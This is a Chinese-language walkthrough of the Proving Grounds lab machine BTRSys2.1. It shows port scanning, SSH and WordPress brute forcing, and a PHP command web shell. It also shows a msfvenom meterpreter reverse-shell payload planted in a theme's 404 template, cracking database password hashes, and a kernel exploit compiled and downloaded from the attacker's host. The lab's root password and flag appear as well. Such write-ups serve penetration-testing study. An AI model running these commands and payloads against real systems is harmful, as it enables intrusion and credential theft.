Proving Grounds靶场04-BTRSys2.1

2024-04-25 846 0

靶机信息

靶机:192.168.151.50 中途重启环境IP为:192.168.217.50

攻击机:192.168.45.173 中途重启环境IP为:192.168.45.215

难度:Intermediate

详细步骤

1、端口扫描&服务探测

端口扫描

发现开放21、22、80端口

sudo nmap -Pn -sS -T4 -p1-65535 192.168.151.50

Proving Grounds靶场04-BTRSys2.1插图

服务探测

对21、22、80端口进行服务探测

sudo nmap -sT -sV -O -sC -p21,22,80 192.168.151.50

Proving Grounds靶场04-BTRSys2.1插图1

2、漏洞探测

21端口探测

searchsploit -t vsftpd 3.0.3 

Proving Grounds靶场04-BTRSys2.1插图2

未发现任何有价值的信息

22端口探测

searchsploit -t Openssh 7.2p2

Proving Grounds靶场04-BTRSys2.1插图3

未发现任何有价值的信息

尝试暴力破解,未成功。

hydra -l root -P /usr/share/wordlists/metasploit/password.lst  192.168.151.50 ssh -t4 -s 22

80端口探测

访问http://192.168.151.50,发现只是一张图片Proving Grounds靶场04-BTRSys2.1插图4

查看页面源码,未得到有价值的信息。

目录扫描

sudo dirsearch -u http://192.168.151.50

Proving Grounds靶场04-BTRSys2.1插图5

访问:http://192.168.151.50/CHANGELOG,没有可用信息,只发现lepton-cms

http://192.168.151.50/INSTALL,发现一写安装的配置信息,

Proving Grounds靶场04-BTRSys2.1插图6

后面发现有wordpress,直接访问http://192.168.151.50/wordpress/wp-login.php

对wordpress进行爆破

wpscan --url http://192.168.151.50:80/wordpress/ --enumerate ap,u,t

Proving Grounds靶场04-BTRSys2.1插图7

发现两个账户 btrisk、admin

Proving Grounds靶场04-BTRSys2.1插图8

将这两个账户制作成账户字典后进行爆破

wpscan --url http://192.168.151.50:80/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt

Proving Grounds靶场04-BTRSys2.1插图9

登录系统

使用admin\admin账户登录系统

GetShell

在互联网上查找wordpress的利用方法,发现:

WordPress可能存在GetShell点
● Media->Add New->上传Shell

● Appearance->Edit Themes->404Template->直接php反弹shell;

● Plugins->Add New->Upload Plugin->上传一个自己手写的插件

采用第一种方案(失败)

1、编辑shell脚本

sudo cp /usr/share/webshells/php/php-reverse-shell.php ./shell1.php
<?php
if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>

2、进行压缩,方便上传

zip shell.zip shell.php

3、上传插件,发现上传报错

Proving Grounds靶场04-BTRSys2.1插图10

以为是环境问题,重启靶机,IP变化如下

靶机:192.168.151.50 中途重启环境IP为:192.168.217.50

攻击机:192.168.45.173 中途重启环境IP为:192.168.45.215

采用第二种方案

使用msf生成php代码反弹shell

sudo msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.45.215 lport=4444 -f raw 

复制payload到404Template,点击更新即可

Proving Grounds靶场04-BTRSys2.1插图11

运行msf,配置相应的参数

msfconsole 

设置php代码反弹shell监听载荷:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp

设置ip地址与监听地址:

set lhost 192.168.45.215
set lport 4444

输入exploit运行

Proving Grounds靶场04-BTRSys2.1插图12

然后访问404页面

http://192.168.217.50/wordpress/wp-content/themes/twentyfourteen/404.php

成功拿到会话

Proving Grounds靶场04-BTRSys2.1插图13

3、内网渗透

FLAG1

通过查找服务器上文件,发现local.txt

cat local.txt

Proving Grounds靶场04-BTRSys2.1插图14

FLAG2

方式一

从wp的配置文件入手,查看文件中有无特别的信息

/var/www/html/wordpress

Proving Grounds靶场04-BTRSys2.1插图15

查看wp-config.php配置文件,发现数据库的配置文件

cat wp-config.php

Proving Grounds靶场04-BTRSys2.1插图16

尝试登录数据库,经过多次尝试

shell
mysql -u root -p -e "use wordpress; select * from wp_users;"

tips:

​-e​ 参数用于指定要执行的 SQL 查询,可以规避掉在Meterpreter的交互式 shell 中使用 use​ 命令时出现 use: not found​ 错误

得到疑似MD5

a318e4507e5a74604aafb45e4741edd3
21232f297a57a5a743894a0e4a801fc3

Proving Grounds靶场04-BTRSys2.1插图17

经过碰撞,得到root的密码为:roottoor

使用root账户登录,获取flag2

ssh [email protected]
roottoor
ls
cat proof.txt
411e412eac335ad5738b260a5180cc5c

方式二

通过收集内核版本,查找相关漏洞

searchsploit -t ubuntu 4.4  

Proving Grounds靶场04-BTRSys2.1插图18

复制脚本文件、编译

sudo cp /usr/share/exploitdb/exploits/linux/local/41458.c /opt/BTRSys2.1
udo gcc 41458.c

本地用python3开启http服务

sudo python3 -m http.server 80

靶机下载、编译文件

cd /tmp
wget http://192.168.45.215/a.out

Proving Grounds靶场04-BTRSys2.1插图19

赋予权限并执行

chmod 777 a.out

版本不兼容的问题

重新编译二进制文件,以便使用目标系统上可用的GLIBC版本。在编译过程中,你可以通过设置适当的编译选项来确保二进制文件与目标系统兼容。

Proving Grounds靶场04-BTRSys2.1插图20


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

苹果试图保护你的隐私,OpenAI可能做不到
Shuffle:一款完全自动化的安全栈增强平台
如何使用CODASM编码Payload并降低熵值
SessionExec:一款针对会话安全的安全命令测试工具
Arkime:一款大规模数据包捕获和索引数据库系统
从蓝队流量角度分析Shiro-550反序列化漏洞

发布评论